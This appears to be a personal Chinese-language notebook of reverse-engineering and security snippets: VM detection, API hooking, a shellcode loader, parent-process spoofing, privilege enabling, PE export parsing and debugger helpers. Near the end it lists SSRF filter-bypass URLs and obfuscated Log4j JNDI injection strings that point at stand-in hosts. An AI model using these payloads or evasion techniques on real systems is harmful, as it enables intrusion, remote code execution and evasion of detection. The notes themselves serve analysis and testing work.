Code记录

cheakvm

BOOL cheakvm(){
    // Hypervisor-presence probe built on CPUID.
    //  * leaf 1, ECX bit 31 is the "hypervisor present" bit;
    //  * when set, leaf 0x40000000 returns the vendor signature in EBX:ECX:EDX;
    //  * for the "Microsoft Hv" signature, leaf 0x40000003 EBX bit 0 is used
    //    (as the original comment says) to recognise the Hyper-V root
    //    partition, i.e. the host itself, which is then reported as "Not VM".
    // Every CPUID result is echoed to stdout as four hex words, and a verdict
    // line is printed. Returns TRUE only when a hypervisor is present and it
    // is not the Hyper-V root partition.
    int regs[4];
    __cpuid(regs, 1);
    printf("%08X-%08X-%08X-%08X\n", regs[0], regs[1], regs[2], regs[3]);

    const bool hypervisor_bit = ((regs[2] >> 31) & 1) != 0;
    if (!hypervisor_bit) {
        printf("Not VM!\n");
        return false;
    }

    bool in_vm = true;
    regs[1] = regs[2] = regs[3] = 0;
    __cpuid(regs, 0x40000000);
    printf("%08X-%08X-%08X-%08X\n", regs[0], regs[1], regs[2], regs[3]);

    // "Micr" "osof" "t Hv" as little-endian dwords.
    const bool microsoft_hv = regs[1] == 0x7263694d
                           && regs[2] == 0x666f736f
                           && regs[3] == 0x76482074;
    if (microsoft_hv) {
        regs[1] = 0;
        __cpuid(regs, 0x40000003);
        printf("%08X-%08X-%08X-%08X\n", regs[0], regs[1], regs[2], regs[3]);
        if (regs[1] & 1) {
            in_vm = false;   // root partition: running on the host, not inside a guest
        }
    }

    printf(in_vm ? "VM Find!\n" : "Not VM!\n");
    return in_vm;
}

MinHook

模板:

#include <iostream>
#include <Windows.h>
#include <MinHook.h>
// Signature of kernelbase!VirtualAlloc. The same type is used for the export
// resolved with GetProcAddress (the hook target) and for the trampoline MinHook
// hands back, through which the original implementation is reached.
typedef LPVOID(__stdcall*  PFN_VirtualAlloc)(
	LPVOID lpAddress,
	SIZE_T dwSize,
	DWORD  flAllocationType,
	DWORD  flProtect
	);

PFN_VirtualAlloc g_VirtualAlloc = NULL;       // address of the export being hooked (MH_CreateHook target)
PFN_VirtualAlloc g_Real_VirtualAlloc = NULL;  // trampoline filled in by MH_CreateHook; Hook_VirtualAlloc forwards to it

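LPVOID Hook_VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType,DWORD flProtect) {
	// Detour for VirtualAlloc: log the request, forward it to the original
	// through the MinHook trampoline in g_Real_VirtualAlloc, and log the result.
	// Returns whatever the original returns; NULL when the trampoline has not
	// been set up (the caller then sees a failed allocation).
	//
	// Format fix: SIZE_T is 64-bit on x64 and DWORD is unsigned long, so the
	// previous plain %x conversions read the wrong argument width.
	printf("dwSize: 0x%zx flAllocationType: 0x%lx flProtect: 0x%lx\n", dwSize, flAllocationType, flProtect);
	//if (flProtect == PAGE_EXECUTE_READWRITE) {
	//	flProtect = PAGE_READWRITE;
	//}
	if (!g_Real_VirtualAlloc) {
		return NULL;
	}
	LPVOID ret = g_Real_VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
	printf("VirtualAlloc Address: 0x%p\n\n", ret);
	return ret;
}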

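int main()
{
	// Install a MinHook detour on kernelbase!VirtualAlloc, perform one
	// allocation so the detour is exercised, wait for a key press, then
	// remove the detour. Returns 0 on success, 1 when MinHook fails to start.
	if (MH_Initialize() != MH_OK) {
		printf("MH_Initialize failed\n");
		return 1;
	}
	// The module queried is kernelbase.dll, so the variable is named after it
	// (the original called it hNtdll). Handles and function pointers are
	// printed with %p; %lx truncates them on x64.
	HMODULE hKernelBase = GetModuleHandle(L"kernelbase.dll");
	printf("hKernelBase: %p\n", (void*)hKernelBase);
	g_VirtualAlloc = (PFN_VirtualAlloc)GetProcAddress(hKernelBase, "VirtualAlloc");
	if (g_VirtualAlloc) {
		printf("pVirtualAlloc: %p\n", (void*)g_VirtualAlloc);
		// Only enable the hook when the trampoline was created; enabling an
		// uncreated hook is an error in MinHook.
		if (MH_CreateHook(g_VirtualAlloc, Hook_VirtualAlloc, (LPVOID*)&g_Real_VirtualAlloc) == MH_OK) {
			MH_EnableHook(g_VirtualAlloc);
		}
	}
	unsigned char *address = (unsigned char *)VirtualAlloc(NULL, 1024, MEM_COMMIT, PAGE_READWRITE);
	(void)address;
	//getchar();
	//HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)address, NULL, 0, NULL);
	system("pause");
	//WaitForSingleObject(hThread, INFINITE);
	// Tear the detour down before returning so no caller can land in
	// Hook_VirtualAlloc during process shutdown.
	MH_DisableHook(MH_ALL_HOOKS);
	MH_Uninitialize();
	return 0;
}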

隐藏console窗口

VS等编译器可以直接在源码中添加:

#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

对于g++, gcc等命令行编译可以添加编译参数:

-Wl,-subsystem,windows 

或者

-Wl,-entry,mainCRTStartup

参考: https://github.com/xmake-io/xmake/issues/10

gcc编译Objective-C

// exp.mm
#import <Foundation/Foundation.h>
int main (int argc, const char * argv[]){
    // Minimal Foundation program: log one string inside an autorelease pool.
    // argc/argv are accepted for the standard signature only; they are unused.
    @autoreleasepool {
        NSLog(@"Sir");
    }
    return 0;
}

gcc命令行:

gcc -framework Foundation exp.mm -o exp

MacOS编译通用二进制文件

// 编译x64架构文件
gcc --target=x86_64-apple-darwin21 ./test.cpp -o ./x64

// 编译arm架构文件
gcc --target=aarch64-apple-darwin21 ./test.cpp -o ./aarch64

// 合为通用二进制文件("胖"二进制文件)
lipo -create -output fat ./aarch64 ./x64

fat

pwnlldb

lldb的简化版pwndbg:

# vim ~/.lldbinit
command script import ~/pwnlldb.py
from typing import Dict
import lldb
from functools import wraps

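# General-purpose registers the Registers command prints (membership test);
# the original listed 'rsi' twice, which was harmless but is dropped here.
OUTPUT_REGISTERS = [
    'rax',
    'rbx',
    'rcx',
    'rdx',
    'rsi',
    'rdi',
    'rbp',
    'rsp',
    'rip'
]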

class bcolors:
    """ANSI SGR escape sequences used to colour the command output."""
    HEADER = '\033[95m'      # bright magenta
    OKBLUE = '\033[94m'      # bright blue
    OKCYAN = '\033[96m'      # bright cyan
    OKGREEN = '\033[92m'     # bright green
    WARNING = '\033[93m'     # bright yellow
    FAIL = '\033[91m'        # bright red
    ENDC = '\033[0m'         # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

# https://gist.github.com/stek29/cdbbbe018f0aaf0b2a9a58c9173becb8
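# https://gist.github.com/stek29/cdbbbe018f0aaf0b2a9a58c9173becb8
# RFLAGS[bit] = [short name, description, label printed by ParseRflags];
# reserved bits carry [None, 'Reserved', None] and are never reported.
RFLAGS = [
    ['CF', 'Carry Flag', 'carry'],                   # bit 0
    [None, 'Reserved', None],                        # bit 1
    ['PF', 'Parity Flag', 'parity'],                 # bit 2
    [None, 'Reserved', None],                        # bit 3
    ['AF', 'Adjust Flag', 'adjust'],                 # bit 4
    [None, 'Reserved', None],                        # bit 5
    ['ZF', 'Zero Flag', 'zero'],                     # bit 6
    ['SF', 'Sign Flag', 'sign'],                     # bit 7
    ['TF', 'Trap Flag', 'trap'],                     # bit 8
    ['IF', 'Interrupt Enable Flag', 'interrupt'],    # bit 9
    ['DF', 'Direction Flag', 'direction'],           # bit 10
    ['OF', 'Overflow Flag', 'overflow'],             # bit 11
    # IOPL occupies bits 12-13 with bit 12 as the low bit; the original had
    # the two entries the other way round.
    ['IOPL_L', 'I/O privilege level Low bit', 'IOPL_L'],    # bit 12
    ['IOPL_H', 'I/O privilege level High bit', 'IOPL_H'],   # bit 13
    ['NT', 'Nested Task Flag', 'nested'],            # bit 14
    [None, 'Reserved', None],                        # bit 15

    # eflags
    ['RF', 'Resume Flag', 'resume'],                 # bit 16
    ['VM', 'Virtual 8086 mode flag', 'VM'],          # bit 17
    ['AC', 'Alignment check', 'alignment'],          # bit 18
    ['VIF', 'Virtual interrupt flag', 'virtual interrupt'],  # bit 19
    ['VIP', 'Virtual interrupt pending', 'VIP'],     # bit 20
    ['ID', 'Able to use CPUID instruction', 'ID'],   # bit 21
    # 22-31 reserved

    # rflags 32-63 reserved
]

def ParseRflags(val):
    """Return the labels (third column of RFLAGS) of every flag bit set in val.

    Reserved bits and bits beyond len(RFLAGS) are ignored; labels come back
    in ascending bit order. ParseRflags(0) == [].
    """
    return [
        label
        for bit, (_short, name, label) in enumerate(RFLAGS)
        if val & (1 << bit) and name != 'Reserved'
    ]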

def FormatOutput(func):
    """Decorator: print a blue rule carrying func's name before the call and a plain blue rule after it.

    The wrapped function's return value is passed through unchanged.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        opening_rule = f"{bcolors.OKBLUE}[{func.__name__.center(60, '-')}]{bcolors.ENDC}"
        closing_rule = f"{bcolors.OKBLUE}[{'-' * 60}]{bcolors.ENDC}"
        print(opening_rule)
        outcome = func(*args, **kwargs)
        print(closing_rule)
        return outcome
    return wrapper

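@FormatOutput
def Registers(debugger, command, result, internal_dict):
    """Print the registers listed in OUTPUT_REGISTERS plus a decoded rflags.

    lldb command-callback signature; command, result and internal_dict are
    unused. Walks every register set of the selected frame of the thread at
    index 0 and prints name: value for matching registers. The unused
    `generalPurposeRegister` local of the original is dropped. Returns None.
    """
    target = debugger.GetSelectedTarget()
    process = target.GetProcess()
    thread0 = process.GetThreadAtIndex(0)
    frame = thread0.GetSelectedFrame()
    for register_set in frame.GetRegisters():
        for register in register_set:
            name = register.GetName()
            if name in OUTPUT_REGISTERS:
                print(f"{bcolors.OKGREEN}{name}{bcolors.ENDC}: {register.GetValue()}")
            elif name == 'rflags':
                value = int(register.GetValue(), 0)
                flags = ParseRflags(value)
                # Alternate green/red by position purely to make the list scannable.
                colorized = [
                    f"{bcolors.OKGREEN}{flag}" if index % 2 else f"{bcolors.FAIL}{flag.upper()}"
                    for index, flag in enumerate(flags)
                ]
                print(f"{bcolors.OKGREEN}rflags {bcolors.ENDC}: {register.GetValue()}({' | '.join(colorized)}{bcolors.ENDC})")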

@FormatOutput
def Code(debugger, command, result, internal_dict):
    """lldb command: disassemble 16 instructions from the selected frame's pc."""
    frame = debugger.GetSelectedTarget().GetProcess().GetSelectedThread().GetSelectedFrame()
    debugger.HandleCommand(f"disassemble --start-address={frame.GetPC()} -c 16")

@FormatOutput
def Stack(debugger, command, result, internal_dict):
    """lldb command: dump 12 giant words (x/12gx) starting at the selected frame's sp."""
    frame = debugger.GetSelectedTarget().GetProcess().GetSelectedThread().GetSelectedFrame()
    debugger.HandleCommand(f"x/12gx {frame.GetSP()}")

class StopHook:
    """Scripted stop-hook: after each stop, print the registers and a stack excerpt."""

    def __init__(self, target: lldb.SBTarget, extra_args: lldb.SBStructuredData, _dict: Dict):
        # lldb supplies target/extra_args/_dict; nothing is kept beyond the announcement.
        print("Pwnlldb StopHook init")

    def handle_stop(self, exe_ctx: lldb.SBExecutionContext, stream: lldb.SBStream):
        # print(f"SP={exe_ctx.frame.sp:#x}")
        # Registers/Stack use the command-callback shape; the command string,
        # result and dict arguments are unused, so empty strings are passed.
        for dump in (Registers, Stack):
            dump(lldb.debugger, "", "", "")

def __lldb_init_module(debugger: lldb.SBDebugger, internal_dict):
    """Entry point lldb calls on `command script import`: install the stop hook and the `code` command."""
    setup_commands = (
        "target stop-hook add -P pwnlldb.StopHook",
        'command script add -f pwnlldb.Code code',
    )
    for cmd in setup_commands:
        debugger.HandleCommand(cmd)

pwnlldb
参考:

  1. https://github.com/ryaoi/lldb-peda/blob/master/reverse.py
  2. https://github.com/ant4g0nist/lisa.py/blob/dev/lisa.py
  3. https://lldb.llvm.org/use/python-reference.html

lldb intel汇编

lldb 设置反汇编风格为 intel

// vim ~/.lldbinit
setting set target.x86-disassembly-flavor intel

Loader ShellCode

方便调试Shellcode:

#include <windows.h>
#include <stdio.h>

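LPVOID LoadFileIntoMemory( LPSTR Path, PDWORD MemorySize ) {
    /*
     * Read the whole file at Path into a LocalAlloc(LPTR) buffer.
     * On success returns the buffer (free with LocalFree) and, when MemorySize
     * is non-NULL, stores the number of bytes read there. Returns NULL, with
     * *MemorySize untouched, when the file cannot be opened, is empty, cannot
     * be sized, cannot be allocated or is read only partially.
     *
     * Fixes vs. the original: OPEN_EXISTING instead of OPEN_ALWAYS (a mistyped
     * path no longer creates an empty file), no unconditional *MemorySize
     * dereference, and the LocalAlloc/ReadFile results are checked.
     */
    HANDLE hFile = CreateFileA( Path, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 );
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf( "Error opening %s\r\n", Path );
        return NULL;
    }

    DWORD size = GetFileSize( hFile, 0 );
    if (size == INVALID_FILE_SIZE || size == 0)
    {
        printf( "Error sizing %s\r\n", Path );
        CloseHandle( hFile );
        return NULL;
    }

    PBYTE ImageBuffer = ( PBYTE ) LocalAlloc( LPTR, size );
    if (ImageBuffer == NULL)
    {
        printf( "Error allocating %lu bytes for %s\r\n", size, Path );
        CloseHandle( hFile );
        return NULL;
    }

    DWORD dwBytesRead = 0;
    BOOL ok = ReadFile( hFile, ImageBuffer, size, &dwBytesRead, 0 );
    CloseHandle( hFile );
    if (!ok || dwBytesRead != size)
    {
        printf( "Error reading %s\r\n", Path );
        LocalFree( ImageBuffer );
        return NULL;
    }

    if ( MemorySize )
        *MemorySize = dwBytesRead;
    return ImageBuffer;
}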

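typedef void ( * ShellcodeMain )();

int main( int argc, char** argv )
{
    /*
     * Debug harness: read a raw code blob from the file named on the command
     * line into a fresh page, make the page executable, wait for Enter, then
     * call it. Returns 0 on the original's paths and 1 when the file cannot
     * be read or the protection change fails (both were unchecked before and
     * would have led to a memcpy from NULL or a fault on call).
     */
    PVOID  ShellcodeBytes  = NULL;
    DWORD  ShellcodeSize   = 0;
    DWORD  OldProtection   = 0;
    LPVOID ShellcodeMemory = NULL;

    if ( argc < 2 )
    {
        printf( "[-] %s <shellcode path>\n", argv[ 0 ] );
        return 0;
    }

    ShellcodeBytes = LoadFileIntoMemory( argv[ 1 ], &ShellcodeSize );
    if ( ! ShellcodeBytes || ShellcodeSize == 0 )
    {
        printf( "[-] Failed to read %s\n", argv[ 1 ] );
        return 1;
    }

    ShellcodeMemory = VirtualAlloc( NULL, ShellcodeSize, MEM_COMMIT, PAGE_READWRITE );
    if ( ! ShellcodeMemory )
    {
        printf( "[-] Failed to allocate Virtual Memory\n" );
        LocalFree( ShellcodeBytes );
        return 0;
    }

    printf( "[*] Address => %p\n", ShellcodeMemory );

    memcpy( ShellcodeMemory, ShellcodeBytes, ShellcodeSize );
    LocalFree( ShellcodeBytes );   /* file buffer is no longer needed once copied */

    /* Kept RWX as in the original so blobs that patch themselves still run;
     * PAGE_EXECUTE_READ is the least-privilege choice for blobs that do not. */
    if ( ! VirtualProtect( ShellcodeMemory, ShellcodeSize, PAGE_EXECUTE_READWRITE, &OldProtection ) )
    {
        printf( "[-] VirtualProtect failed: %lu\n", GetLastError() );
        VirtualFree( ShellcodeMemory, 0, MEM_RELEASE );
        return 1;
    }

    puts( "[+] Execute shellcode... press enter" );
    getchar();

    ((ShellcodeMain)ShellcodeMemory)();
    return 0;
}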

伪造父进程

#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <TlHelp32.h>
#include <iostream>

int wmain(int argc, wchar_t **argv)
{
	// Starts a child process whose recorded parent is the process given with
	// -p <pid>, via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS startup attribute;
	// -c <cmdline> overrides the default "notepad.exe". Always returns 0, also
	// when OpenProcess or CreateProcessW fail.
	// Defensive note: because of that attribute, the parent PID the child
	// reports is the handle passed below rather than this program, so
	// parent-PID alone is not a reliable provenance signal in process telemetry.
	STARTUPINFOEXW si;
	PROCESS_INFORMATION pi;
	SIZE_T attributeSize;
	int targetPid = -1;          // stays -1 when -p is absent; OpenProcess then receives 0xFFFFFFFF and presumably fails
	int cnt = 1;                 // index of the argument currently being parsed
	wchar_t defaultCmdline[] = L"notepad.exe";
	wchar_t* cmdline = defaultCmdline;

	// Option loop: an option and its value each consume one slot (++cnt / --argc).
	// NOTE(review): argv[cnt] is read after ++cnt without checking cnt < argc,
	// so a trailing "-p" or "-c" with no value reads past the argument vector.
	while ((argc > 1) && (argv[cnt][0] == '-'))
	{
		switch (argv[cnt][1])
		{
		case 'p':
			++cnt;
			--argc;
			targetPid = _wtoi(argv[cnt]);
			break;
		case 'c':
			++cnt;
			--argc;
			cmdline = argv[cnt];
			printf("cmdline: %S\n", cmdline);
			break;
		default:
			printf("Wrong Argument: %S\n", argv[cnt]);
			printf("%S -p pid\n", argv[0]);
			exit(-1);
		}
		++cnt;
		--argc;
	}

	HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, targetPid);
	if (parentProcessHandle) {
		// First call only computes the attribute-list size (it fails by design).
		InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
		// NOTE(review): sizeof(STARTUPINFOEXA) for a STARTUPINFOEXW; the two types
		// have the same size, but sizeof(si) is the consistent form.
		ZeroMemory(&si, sizeof(STARTUPINFOEXA));
		si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
		InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);
		UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
		si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
		//si.StartupInfo.lpDesktop = (LPWSTR)L"winsta0\\default";
		// EXTENDED_STARTUPINFO_PRESENT tells CreateProcessW to honour lpAttributeList.
		if (!CreateProcessW(NULL, (LPWSTR)cmdline, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
			printf("Error Code: 0x%x\n", GetLastError());
		}
		// NOTE(review): parentProcessHandle, pi.hProcess and pi.hThread are never
		// closed, and the attribute list is neither deleted nor freed.
	}
	return 0;
}

参考: https://github.com/antonioCoco/MalSeclogon/tree/master

QiLing Demo

from qiling import *
from qiling.const import QL_VERBOSE
from pwnlib.util.packing import p64

src = b""   # current 8-byte input; rebound by the driver loop before each ql.run() and read by set_key_scr
def set_key_scr(ql: Qiling):
    """Hook at 0x140011A40: stage the key and the current input, then point rdx/rcx at them.

    Layout inside the scratch page mapped by the driver: a 16-byte key at
    0x1000 and the module global ``src`` at 0x1010. rdx -> key, rcx -> input.
    Both register values are echoed to stdout.
    """
    key_addr, src_addr = 0x1000, 0x1010
    key_bytes = b"\x12\x00\x00\x00\x34\x00\x00\x00\x56\x00\x00\x00\x78\x00\x00\x00"
    ql.mem.write(key_addr, key_bytes)   # key
    ql.mem.write(src_addr, src)
    ql.arch.regs.rdx = key_addr
    ql.arch.regs.rcx = src_addr
    print(f"ql_rcx: {ql.arch.regs.rcx:#x}")
    print(f"ql_rdx: {ql.arch.regs.rdx:#x}")


def get_result(ql: Qiling):
    """Hook at 0x140011B91 (one byte before the run's end address): dump key and result.

    Prints the 16 key bytes at 0x1000 and the 8 result bytes at 0x1010, each
    byte as a hex literal followed by a space, one line per buffer.
    """
    key = ql.mem.read(0x1000, 0x10)
    print("key: " + "".join(f"{b:#x} " for b in key))
    result = ql.mem.read(0x1010, 8)
    print("result: " + "".join(f"{b:#x} " for b in result))


path = ['QiLing\\examples\\rootfs\\x8664_windows\\bin\\easy.exe']
rootfs = "QiLing\\examples\\rootfs\\x8664_windows\\"
ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DISABLED)
# Scratch page used by the hooks: key at 0x1000, input at 0x1010.
ql.mem.map(0x1000, 0x1000, info='[key]')
ql.hook_address(set_key_scr, 0x140011A40)
ql.hook_address(get_result, 0x140011B91)
# Run the routine once per candidate input; set_key_scr reads `src` on each run.
for candidate in range(0x10000000, 0x10000005):
    print(f"src_i: {candidate:#x}")
    src = p64(candidate)
    ql.run(begin=0x140011A40, end=0x140011B92)

打开Win10内核远程调试

bcdedit /debug on
bcdedit /dbgsettings net hostip:w.x.y.z port:n

w.x.y.z为远程调试机器的IP, n是需要的调试端口

SSRF Bypass

http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://0000::1
http://0000::1:25
http://0000::1:22
http://0000::1:3128
http://2130706433
http://3232235521
http://3232235777
http://2852039166
http://0o177.0.0.1

获取导出函数地址

MZ头->PE头->导出表->遍历->比较Name->获得NameOrdinals->取Functions,得到函数在内存中基地址的偏移量:

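// #include <psapi.h>
// Resolve an export by name by walking the export directory of a module
// loaded into this process. All PE fields are RVAs (byte offsets from the
// image base), so the arithmetic is done on a BYTE* — adding to an HMODULE
// is either rejected by the compiler or scaled by the handle's pointee size.
// Fixes vs. the original: BYTE* arithmetic, 16-bit ordinal table
// (AddressOfNameOrdinals holds WORDs), the _Functions/_Function name mismatch,
// and _addr declared outside the loop so the result survives the break.
// NOTE: forwarded exports (an address that points back inside the export
// directory) are not detected; they resolve to a forwarder string, not code.
HMODULE _base_addr = LoadLibrary(<DllName>);
PBYTE _base = (PBYTE)_base_addr;
PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)_base;
PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(_base + pdh->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pexports = (PIMAGE_EXPORT_DIRECTORY)(_base +
                      pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD _Functions = (PDWORD)(_base + pexports->AddressOfFunctions);
PDWORD _Name = (PDWORD)(_base + pexports->AddressOfNames);
PWORD _NameOrdinals = (PWORD)(_base + pexports->AddressOfNameOrdinals);

PVOID _addr = NULL;   // NULL when <FunctionName> is not among the named exports
for (DWORD i = 0; i < pexports->NumberOfNames; i++) {
    if (!strcmp((const char *)(_base + _Name[i]), <FunctionName>)) {
        _addr = _base + _Functions[_NameOrdinals[i]];
        break;
    }
}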
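/*
 * Enumerate the named exports of a module mapped in another process. Every
 * structure is read through VMhandle (a process handle with read access; see
 * the OpenProcess snippet) rather than dereferenced, since the addresses are
 * only meaningful in that process. BaseAddress is the module's load address
 * there. Each export is printed as "<virtual address> <name>".
 */
IMAGE_DOS_HEADER dosheader;
IMAGE_OPTIONAL_HEADER64 opthdr; // parsing a 64-bit PE
// IMAGE_OPTIONAL_HEADER32 opthdr; // parsing a 32-bit PE
IMAGE_EXPORT_DIRECTORY exports;
ReadProcessMemory(VMhandle, BaseAddress, &dosheader, sizeof(IMAGE_DOS_HEADER), 0);
// e_lfanew + 24: skip the 4-byte NT signature and the 20-byte IMAGE_FILE_HEADER.
ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + dosheader.e_lfanew + 24, &opthdr, sizeof(IMAGE_OPTIONAL_HEADER64), 0);
// ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + dosheader.e_lfanew + 24, &opthdr, sizeof(IMAGE_OPTIONAL_HEADER32), 0);
//EXPORT Table
ReadProcessMemory(VMhandle, ((BYTE *)BaseAddress + opthdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress), &exports, sizeof(IMAGE_EXPORT_DIRECTORY), 0);

PULONG pAddressOfFunctions = (ULONG *)((BYTE *)BaseAddress + exports.AddressOfFunctions);
PULONG pAddressOfNames = (ULONG *)((BYTE *)BaseAddress + exports.AddressOfNames);
PUSHORT pAddressOfNameOrdinals = (USHORT *)((BYTE *)BaseAddress + exports.AddressOfNameOrdinals);

//SymbolName
ULONG addr = 0;
char pFuncName[64] = {0};
USHORT index = 0;   // ordinals are 16-bit; the original read sizeof(USHORT) bytes into an int
for (DWORD i = 0; i < exports.NumberOfNames; i++)
{
    ReadProcessMemory(VMhandle, pAddressOfNameOrdinals + i, &index, sizeof(USHORT), 0);
    ReadProcessMemory(VMhandle, pAddressOfFunctions + index, &addr, sizeof(ULONG), 0);
    ULONG offset = 0;
    ReadProcessMemory(VMhandle, pAddressOfNames + i, &offset, sizeof(ULONG), 0);
    // The name is NUL-terminated in the target but may exceed the buffer;
    // read one byte less and terminate explicitly so printf cannot overrun.
    ReadProcessMemory(VMhandle, (BYTE *)BaseAddress + offset, pFuncName, sizeof(pFuncName) - 1, 0);
    pFuncName[sizeof(pFuncName) - 1] = '\0';
    printf("0x%p %s \n", (PVOID)((BYTE *)BaseAddress + addr), pFuncName);
}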

OpenProcess Error 5

OpenProcess()获取进程句柄返回错误码5(Access is denied.), 这个进程可能是一个服务启动的, 需要提权, 将权限设置为SE_PRIVILEGE_ENABLED:

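int pid = 1234;
VMhandle = OpenProcess(PROCESS_VM_READ, FALSE, pid);
// OpenProcess returns NULL on failure (a HANDLE is a pointer; "<= 0" was a
// signed comparison on it). When the first attempt fails, enable
// SeDebugPrivilege on our own token and retry.
if (VMhandle == NULL) {
//        printf("OpenProcess Error: %ld\n", GetLastError());
    HANDLE hToken = NULL;
    BOOL fOk = FALSE;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)
            && AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) {
            // AdjustTokenPrivileges succeeds even when the privilege is not held
            // (ERROR_NOT_ALL_ASSIGNED), so GetLastError() is the real verdict.
            fOk = (GetLastError() == ERROR_SUCCESS);
        }
        CloseHandle(hToken);
    }
    if (fOk) {
        // Re-request only what the read/symbol snippets on this page need rather
        // than PROCESS_ALL_ACCESS; widen the mask if a later call requires it.
        VMhandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    }
}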

获取程序所有符号

#include <windows.h>
#include <stdio.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

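BOOL CALLBACK EnumSymProc(
        PSYMBOL_INFO pSymInfo,
        ULONG SymbolSize,
        PVOID UserContext)
{
    /* SymEnumSymbols callback: print "<address> <size> <name>" for one symbol.
     * Address is a ULONG64, so it is printed with %016llX; the previous %08X
     * consumed only 32 bits of it and misaligned the remaining arguments.
     * Always returns TRUE so enumeration continues. */
    (void)UserContext;
    printf("%016llX %4lu %s\n",
           (unsigned long long)pSymInfo->Address, SymbolSize, pSymInfo->Name);
    return TRUE;
}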
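int main(){
    // Enumerate every symbol of every module ("*!*") loaded in the process
    // behind VMhandle (the handle from the OpenProcess snippet) and print them
    // through EnumSymProc. Returns 1 when SymInitialize fails, else 0.
    DWORD64 BaseOfDll = 0L;        // 0 with a "module!name" mask: search all loaded modules
    const char *Mask = "*!*";      // a string literal must not bind to a non-const char*
    if (!SymInitialize(VMhandle, NULL, TRUE))   // TRUE: enumerate and load the target's modules
    {
        printf("SymInitialize failed: %lu\n", GetLastError());
        return 1;
    }
    if (SymEnumSymbols(VMhandle, BaseOfDll, Mask, EnumSymProc, NULL))
    {
        // SymEnumSymbols succeeded
    }
    else
    {
        // SymEnumSymbols failed
        printf("SymEnumSymbols failed: %lu\n", GetLastError());
    }
    SymCleanup(VMhandle);
    return 0;
}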

获取指定符号:

#include <windows.h>
#include <stdio.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
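ULONG64 lookupInProcess(char *SymbolName) {
    /*
     * Resolve SymbolName to an address in the process behind VMhandle with
     * dbghelp. Returns the symbol's address, or 0 when symbol initialisation
     * or the lookup fails (an error message is printed in both cases).
     */
    ULONG64 SymbolAddr = 0;
    /* SYMBOL_INFO is followed in memory by the name; size the buffer for
     * MAX_SYM_NAME characters, rounded up to whole ULONG64s for alignment. */
    ULONG64 buffer[(sizeof(SYMBOL_INFO) +
                    MAX_SYM_NAME * sizeof(TCHAR) +
                    sizeof(ULONG64) - 1) /
                   sizeof(ULONG64)];
    PSYMBOL_INFO pSymbol = (PSYMBOL_INFO) buffer;

    pSymbol->SizeOfStruct = sizeof(SYMBOL_INFO);
    pSymbol->MaxNameLen = MAX_SYM_NAME;
    if (!SymInitialize(VMhandle, NULL, TRUE)) {
        /* Previously unchecked: SymFromName on an uninitialised session only yields a confusing error. */
        printf("SymInitialize returned error : %lu\n", GetLastError());
        return 0;
    }

    if (SymFromName(VMhandle, SymbolName, pSymbol)) {
        SymbolAddr = pSymbol->Address;
    } else {
        DWORD error = GetLastError();
        printf("SymFromName returned error : %lu\n", error);
    }
    SymCleanup(VMhandle);
    return SymbolAddr;
}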
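int main(){
	// Look up this program's own lookupInProcess symbol and print its address.
	// ULONG64 is printed with %llx; %p expects a pointer and reads the wrong width.
	ULONG64 addr = lookupInProcess("lookupInProcess");
	printf("addr:%llx\n", (unsigned long long)addr);
	return 0;
}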

sa-jdi.jar

# 命令行版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.CLHSDB
# 图形界面版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.HSDB
# Javascript引擎版本
java -cp "%JAVA_HOME%/lib/sa-jdi.jar" sun.jvm.hotspot.tools.soql.JSDB

Log4j

${jndi:ldap://127.0.0.1:1389/Exploit}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

半透明窗口

